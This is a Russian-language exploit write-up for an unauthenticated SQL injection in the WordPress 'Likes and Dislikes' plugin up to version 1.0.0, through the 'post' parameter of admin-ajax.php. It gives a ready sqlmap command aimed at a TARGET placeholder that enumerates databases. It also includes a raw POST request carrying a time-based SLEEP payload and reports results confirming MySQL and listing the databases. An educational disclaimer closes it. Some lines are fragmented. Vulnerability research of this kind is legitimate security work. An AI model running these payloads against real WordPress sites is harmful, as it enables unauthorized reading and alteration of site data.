
Плагин WordPress Likes and Dislikes Plugin <= 1.0.0 уязвим к SQL-инъекции.
Обнаружил: Khaled_Alenazi (Nxploited) Опубликовано: 27 мая 2025 г.
Плагин Likes and Dislikes для WordPress уязвим к SQL-инъекциям через параметр post во всех версиях вплоть до 1.0.0 включительно.
Из-за недостаточного экранирования и отсутствия подготовленных выражений неаутентифицированные злоумышленники могут внедрять сырой SQL в серверные запросы, что приводит к утечке или изменению данных.
post/wp-admin/admin-ajax.phpsqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
Эта команда подтверждает точку инъекции и перечисляет базы данных с помощью time-based техники.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close
action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
boolean-based blind и time-based blind SQLi.
- Подтверждено, что серверная СУБД — MySQL.
- Перечислены базы данных: db, test, information_schema. 
15 секунд, что указывает на реальную инъекцию. 
post.Данный материал предоставлен только в образовательных и исследовательских целях. Автор не одобряет вредоносную деятельность или эксплуатацию систем без явного разрешения.
Khaled_Alenazi (Nxploited)